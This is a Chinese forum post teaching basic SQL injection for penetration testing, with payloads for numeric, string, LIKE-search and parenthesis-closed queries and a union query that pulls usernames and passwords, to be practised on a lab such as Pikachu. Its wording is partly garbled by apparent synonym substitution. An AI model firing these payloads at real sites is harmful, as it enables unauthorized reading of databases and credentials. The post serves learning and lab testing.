风雨同行 发表于 2024-11-6 09:33:13

渗透测试SQL注入 之 【常规的SQL注入语句】 这个渗透测试知识点教会你怎样

目录
什么是SQL注入
字符范例注入
URL编码
团结注入查询 Union
简单常用sql注入语句
数字范例:
字符型:
搜索性注入:
XX性注入:
最后:



什么是SQL注入

SQL注入攻击毛病的缘故原由,是由于程序员在编写Web程序时,没有对客户端(好比浏览器等)提交的参数进行严酷的过滤和判断。用户可以修改参数或数据,并通报至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端实行,数据库将sql语句的实行结果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,乃至实行危险的代码或系统命令。

[*] 简单来说就是:注入产生的缘故原由是接受相关参数未经处理直接带入数据库查询操作
[*] 查找注入点一句话简单概括就是:前端页面上所有提交数据的地方,不管是登录、注册、留言板、批评区、分页等等地方,只要是提交数据给后台,后台拿着该数据和数据库交互了,那么这个地方就大概存在注入点。
字符范例注入

xxx' or 1=1 #
select id,email from member where username='=xx' or 1=1 #'
转化成True 查询所有username
select id,email from member where username= True #'
' 处于前面闭合状态 -- # 解释得作用
select id,email form member where username = "vince"

URL编码

url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符,将数据排行等等)作为URL的一部门或者分离地发给服务器。不管哪种情况,在服务器端的表单输入格式样子像这样:

[*] 当 URL 路径或者查询参数中,带有中文或者特殊字符的时间,就必要对 URL 进行编码
[*] 采用ASCII十六进制编码格式)。
[*] URL 编码的原则是使用安全字符去表示那些不安全的字符。
[*] 安全字符,值的是没有特殊用途或者特殊意义的字符。 Key=Value
[*] Ascill编码转转化成对应得数字
工具:
小葵工具 URL编码 也可以存在于在线编码格式
URL种得空格处理:
在URL中出现空格以+得方式来处理 URL get请求不能出现空格
Get UIL种 不能使用#号 只能使用—解释符号
团结注入查询 Union

多表团结查询 不同表之间得查询:
正常语句:

[*] select id,username from member where username='vince';
构造语句:

[*] xxx' union select username,password from users #'
[*] 注意一点:union为团结查询,但是union后面的select查询的字段数量,必须和union前面的select查询字段个数相同,这是union的特点。
[*] union select 团结查询 # 关系型数据库 redis非关系型的是不能用union select的

团结注入语句: 可以查任何表得数据 至于表明列名称 列得长度必要特殊注意数量 多了少了都不行这个必要尝试。
' union select username,password from users #
select id,email from member where username='' union select username,password from users #'
简单常用sql注入语句

引号测试,加了引号如果报错,证明存在注入点

[*] 单引号闭合数据:$query="select id,email from member where username='vince'"; 用
单引号测试,会报错,双引号测试查不到数据,不报错

[*] 双引号闭合数据:$query='select id,email from member where username="vince"'; 用
双引号测试,会报错,单引号测试查不到数据,不报错
or 1=1 一个条件为真,即为真,真的结果就是查询到表中所有数据
where id=1 and 1=1 两个条件为真才为真,查询结果和不加1=1一样,and 1=2 一个条件为假,即为
假,查询条件为假,什么数据也没有,两个结合起来可以判断是否存在注入点。

SQL注入以及数据范例分类有哪几种?
这个是面试常常问道的:
重要分为如下四类:数字型、字符型、搜索型、xx型
数字范例:

select username,id from member where id=1;
1 or 1=1;
字符型:

select id,usernamefrom member where username='vince or 1=1';
select id email from member where username = 'vince'

发现:这个语句的 vince or 1=1 是直接被认作字符串,我们在vince后面添加单引号来闭合vince,再在1=1后面添加解释#来消撤除后面的单引号。
#和--是mysql的sql语句解释符号,这样来完成一个SQL语句的拼接正当性。完备的语句为 select id,email from member where username='vince' or 1=1#'; ,我们回到pikachu平台输入 vince' or 1=1#
搜索性注入 xx情势注入
搜索性注入:

Select id,email from member where username like ‘%vin’
Select id,email from member where username like ‘vin%’
Select id,email from member where username like ‘%vin%’
select username,id,email from member where username like '%%' or 1=1 #%'
注意: 这里的 %' or 1=1 #%' 固然单引号可以闭合 但是很多时间还是必要闭合%
也就是搜索性要多注意%的闭合

%%闭合也就是为了查询到更多的数据


[*] %xxxx%' or 1=1 #%'
或者


[*] xxxx%' or 1=1 #%'
XX性注入:

select * from member where username=('vince') ;
select * from member where username=('xx') or 1=1;
select id,email from member where username=('') or 1=1 #')
') or 1=1 #')
Xx注入 注意小括号的闭合状态
以上就是基本的数据范例注入 数字 字符 搜索 xx 注入范例

最后:

大家明白什么是sql注入 以及常规的sql注入语句范例了吧! 文中的pyload自行拿去用! 至于怎样试验 自己去用假造机搭建一个靶场就可以进行测试学习了,靶场有很多这个自己百度吧! 如果不会搭建靶场或者没有靶场源码的改天有空我在写一个搭建靶场的文章以及分享靶场源码吧 ~ 好了写道这里了 喜欢的点个赞吧 哈哈 后面有空或许在这边文章上添加几个示例便于大家学习 ~ 最后就是sql注入的高阶手法还有很多,后面有空再分享一二吧 ~ 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 渗透测试SQL注入 之 【常规的SQL注入语句】 这个渗透测试知识点教会你怎样